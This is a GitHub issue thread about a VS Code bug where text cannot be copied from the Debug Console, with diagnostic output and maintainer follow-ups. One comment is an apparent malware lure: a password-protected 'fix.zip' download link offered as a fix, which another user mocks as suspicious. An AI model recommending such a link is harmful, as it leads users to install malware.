### ISSUE TITLE
Can't copy selected text from Debug Console

### ISSUE THREAD

**Issue by sauntor** [microsoft/vscode#226777]
Type: <b>Bug</b>

**_Console output from Developer Tools_**

  ERR Method not found: toJSON: CodeExpectedError: Method not found: toJSON
    at Object.call (/usr/share/code/resources/app/out/vs/code/electron-main/main.js:47:5401)
    at y.s (/usr/share/code/resources/app/out/vs/code/electron-main/main.js:45:6820)
    at y.q (/usr/share/code/resources/app/out/vs/code/electron-main/main.js:45:6275)
    at P.value (/usr/share/code/resources/app/out/vs/code/electron-main/main.js:45:5584)
    at t.B (/usr/share/code/resources/app/out/vs/code/electron-main/main.js:41:743)
    at t.C (/usr/share/code/resources/app/out/vs/code/electron-main/main.js:41:815)
    at t.fire (/usr/share/code/resources/app/out/vs/code/electron-main/main.js:41:1034)
    at P.value (/usr/share/code/resources/app/out/vs/code/electron-main/main.js:36:45885)
    at t.B (/usr/share/code/resources/app/out/vs/code/electron-main/main.js:41:743)
    at t.fire (/usr/share/code/resources/app/out/vs/code/electron-main/main.js:41:963)
    at P.value (/usr/share/code/resources/app/out/vs/code/electron-main/main.js:36:46090)
    at t.B (/usr/share/code/resources/app/out/vs/code/electron-main/main.js:41:743)
    at t.fire (/usr/share/code/resources/app/out/vs/code/electron-main/main.js:41:963)
    at ee (/usr/share/code/resources/app/out/vs/code/electron-main/main.js:36:48537)
    at IpcMainImpl.c (/usr/share/code/resources/app/out/vs/code/electron-main/main.js:47:19995)
    at IpcMainImpl.emit (node:events:519:28)
    at WebContents.<anonymous> (node:electron/js2c/browser_init:2:82388)
    at WebContents.emit (node:events:519:28)

VS Code version: Code 1.92.2 (fee1edb8d6d72a0ddff41e5f71a671c23ed924b9, 2024-08-14T17:29:30.058Z)
OS version: Linux x64 6.4.0-150600.23.17-default
Modes:

<details>
<summary>System Info</summary>

|Item|Value|
|---|---|
|CPUs|Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz (8 x 3469)|
|GPU Status|2d_canvas: enabled<br>canvas_oop_rasterization: enabled_on<br>direct_rendering_display_compositor: disabled_off_ok<br>gpu_compositing: enabled<br>multiple_raster_threads: enabled_on<br>opengl: enabled_on<br>rasterization: enabled<br>raw_draw: disabled_off_ok<br>skia_graphite: disabled_off<br>video_decode: enabled<br>video_encode: disabled_software<br>vulkan: disabled_off<br>webgl: enabled<br>webgl2: enabled<br>webgpu: disabled_off<br>webnn: disabled_off|
|Load (avg)|2, 2, 1|
|Memory (System)|31.07GB (23.14GB free)|
|Process Argv|--crash-reporter-id 64900827-e0b2-4909-95fc-93b8bbdbbd52|
|Screen Reader|no|
|VM|0%|
|DESKTOP_SESSION|plasma6|
|XDG_CURRENT_DESKTOP|KDE|
|XDG_SESSION_DESKTOP|KDE|
|XDG_SESSION_TYPE|x11|
</details><details><summary>Extensions (51)</summary>

Extension|Author (truncated)|Version
---|---|---
apache-netbeans-java|asf|22.9.9
vscode-eslint|dba|3.0.10
vscode-keypromoter|don|1.0.2
go|gol|0.42.0
svn-scm|joh|2.17.0
vscode-docker|ms-|1.29.2
csdevkit|ms-|1.9.55
csharp|ms-|2.39.29
vscode-dotnet-runtime|ms-|2.1.5
vscode-kubernetes-tools|ms-|1.3.16
debugpy|ms-|2024.10.0
python|ms-|2024.12.3
vscode-pylance|ms-|2024.8.2
jupyter|ms-|2024.7.0
jupyter-keymap|ms-|1.1.2
jupyter-renderers|ms-|1.0.19
vscode-jupyter-cell-tags|ms-|0.1.9
vscode-jupyter-slideshow|ms-|0.1.6
remote-containers|ms-|0.380.0
remote-ssh|ms-|0.113.1
remote-ssh-edit|ms-|0.86.0
cmake-tools|ms-|1.18.44
cpptools|ms-|1.21.6
cpptools-extension-pack|ms-|1.3.0
remote-explorer|ms-|0.4.3
gcn|ora|0.9.10
graal-cloud-native-pack|ora|0.0.7
micronaut|ora|0.6.4
micronaut-tools|ora|0.6.6
oci-devops|ora|0.9.8
java|red|1.33.0
vscode-microprofile|red|0.12.0
vscode-quarkus|red|1.18.0
vscode-yaml|red|1.15.0
LiveServer|rit|5.7.9
rust-analyzer|rus|0.3.2089
scala|sca|0.5.7
metals|sca|1.39.0
cmake|twx|0.0.17
intellicode-api-usage-examples|Vis|0.2.8
vscodeintellicode|Vis|1.3.1
vscode-boot-dev-pack|vmw|0.2.1
vscode-spring-boot|vmw|1.56.0
vscode-gradle|vsc|3.16.4
vscode-java-debug|vsc|0.58.0
vscode-java-dependency|vsc|0.24.0
vscode-java-pack|vsc|0.29.0
vscode-java-test|vsc|0.42.0
vscode-maven|vsc|0.44.0
vscode-spring-boot-dashboard|vsc|0.14.0
vscode-spring-initializr|vsc|0.11.2

(1 theme extensions excluded)

</details><details>
<summary>A/B Experiments</summary>

```
vsliv368:30146709
vspor879:30202332
vspor708:30202333
vspor363:30204092
vscod805:30301674
binariesv615:30325510
vsaa593:30376534
py29gd2263:31024239
c4g48928:30535728
azure-dev_surveyone:30548225
962ge761:30959799
pythongtdpath:30769146
welcomedialog:30910333
pythonnoceb:30805159
asynctok:30898717
pythonregdiag2:30936856
pythonmypyd1:30879173
h48ei257:31000450
pythontbext0:30879054
accentitlementst:30995554
dsvsc016:30899300
dsvsc017:30899301
dsvsc018:30899302
cppperfnew:31000557
dsvsc020:30976470
pythonait:31006305
dsvsc021:30996838
945dj816:31013170
pythoncenvpt:31062603
a69g1124:31058053
dvdeprecation:31068756
dwnewjupytercf:31046870
impr_priority:31102340
nativerepl1:31104043
refactort:31108082
pythonrstrctxt:31112756
flighttreat:31119336
wkspc-onlycs-t:31111718
wkspc-ranged-c:31125598
ei213698:31121563
aajjf12562:31125793

```

</details>

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by turkeylurkey** [comment]
Not suspicious at all.

**Comment by roblourens** [comment]
I'm a little confused by the error, can you explain some more? How do you copy, keyboard shortcut, context menu, ? Works fine for me now

**Comment by sauntor** [comment]
@roblourens both, no matter copying via shortcut or context menu

**Comment by roblourens** [comment]
Could you try with the latest Insiders build to see whether it's any different in the latest Electron?

What Linux distro are you using?
